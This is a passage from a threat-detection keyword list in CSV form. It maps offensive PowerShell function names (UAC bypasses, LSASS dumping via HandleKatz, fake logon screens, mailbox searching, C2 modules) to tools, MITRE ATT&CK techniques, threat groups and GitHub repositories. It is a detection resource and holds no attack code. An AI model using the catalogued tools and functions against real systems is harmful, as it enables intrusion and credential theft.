,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EssessAgress*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*invoke-eternalblue*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - 
T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-EventHunter*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*invoke-eventhunter*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*Invoke-EventViewer *.exe*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,1,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*Invoke-EventViewer.ps1*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,1,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*Invoke-EventVwrBypass*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*Invoke-EventVwrBypass*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-EventVwrBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ExecuteMSBuild*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-ExecuteMSBuild.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ExecuteMSBuild.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ExploitableLeakedHandlesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Eyewitness*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-FakeLogonScreen*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - 
T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Farmer*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*invokefilefinder*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-FileFinder*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-FileFinder*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-FodHelperBypass*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-FodHelperBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-FodHelperBypass*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ForgeUserAgent*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Invoke-Get-RBCD-Threaded*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Get-RBCD-Threaded*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - 
T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-GlobalMailSearch*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-GlobalMailSearch*,offensive_tool_keyword,MailSniper,To search all mailboxes in a domain,T1595 T1114 T1590 T1591 T1114,N/A,N/A,N/A,Reconnaissance,https://github.com/dafthack/MailSniper,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-GlobalO365MailSearch*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. 
or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-GoFetch*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,1,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*Invoke-Gopher*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-GPPPasswordCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-GPPPasswordCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Grouper2*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z 
-*Invoke-Grouper2*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Grouper3*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Grouper3*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-HandleKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-HandleKatz*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Handlekatz*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z 
-*Invoke-HardenedUNCPathCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-HijackableDllsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-HijackableDllsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-HoneypotBuster*,offensive_tool_keyword,HoneypotBuster,Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host,T1083 - T1059.001 - T1112,TA0007 - TA0002,N/A,N/A,Lateral Movement,https://github.com/JavelinNetworks/HoneypotBuster,1,1,N/A,8,3,270,60,2017-12-05T13:03:11Z,2017-07-22T15:40:44Z -*Invoke-HostEnum -*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/red-team-scripts,1,0,N/A,10,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*invoke-hostenum -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-HostEnum*,offensive_tool_keyword,red-team-scripts,script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. 
it can also perform limited domain enumeration with the -Domain switch,T1016 - T1087.001 - T1049 - T1069,TA0007 - TA0003 - TA0006,N/A,N/A,Discovery,https://github.com/threatexpress/red-team-scripts,1,1,N/A,N/A,10,1089,197,2019-11-18T05:30:18Z,2017-05-01T13:53:05Z -*Invoke-HostRecon*,offensive_tool_keyword,HostRecon,Invoke-HostRecon runs a number of checks on a system to help provide situational awareness to a penetration tester during the reconnaissance phase of an engagement. It gathers information about the local system. users. and domain information. It does not use any 'net. 'ipconfig. 'whoami. 'netstat. or other system commands to help avoid detection.,T1082 - T1087 - T1033,TA0001 - TA0007 - ,N/A,N/A,Information Gathering,https://github.com/dafthack/HostRecon,1,1,N/A,N/A,5,401,114,2017-10-03T13:25:06Z,2017-03-28T14:53:21Z -*invoke-hostscan*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-HotFixVulnCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege 